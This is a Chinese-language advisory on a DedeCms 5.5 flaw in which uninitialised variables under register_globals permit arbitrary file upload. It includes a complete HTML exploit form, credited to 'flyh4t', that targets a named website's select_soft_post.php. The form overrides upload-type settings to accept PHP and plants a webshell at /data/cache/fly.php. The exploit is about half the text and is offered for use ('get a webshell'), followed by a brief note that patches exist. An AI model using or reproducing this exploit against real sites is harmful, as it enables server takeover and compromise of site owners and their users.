Dedecms内容系统中select_soft_post.php页面变量未初始漏洞

2011-3-31 18:01:16 来源:网络转载 浏览:228
Dedecms内容系统中select_soft_post.php页面变量未初始漏洞
影响版本:Dedecms 5.5

程序介绍: DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于DedeCms核心,是目前国内应用最广泛的php类CMS系统。

漏洞分析: 漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。

漏洞利用:
  1. <html>  
  2. <head>  
  3. <title>Dedecms v55 RCE Exploit Codz By flyh4t</title>  
  4. </head>  
  5. <body style="FONT-SIZE: 9pt">---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />  
  6. <form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>  
  7. <input type='hidden' name='activepath' value='/data/cache/' />  
  8. <input type='hidden' name='cfg_basedir' value='../../' />  
  9. <input type='hidden' name='cfg_imgtype' value='php' />  
  10. <input type='hidden' name='cfg_not_allowall' value='txt' />  
  11. <input type='hidden' name='cfg_softtype' value='php' />  
  12. <input type='hidden' name='cfg_mediatype' value='php' />  
  13. <input type='hidden' name='f' value='form1.enclosure' />  
  14. <input type='hidden' name='job' value='upload' />  
  15. <input type='hidden' name='newname' value='fly.php' />  
  16. Select U Shell <input type='file' name='uploadfile' size='25' />  
  17. <input type='submit' name='sb1' value='确定' />  
  18. </form>  
  19. <br />It's just a exp for the bug of Dedecms V55...<br />  
  20. Need register_globals = on...<br />Fun the game,get a webshell at /data/cache/fly.php...<br />  
  21. </body>  
  22. </html>   

解决方案:
开发厂商:DesDev Inc.
目前厂商已经提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.dedecms.com
(0)
(0)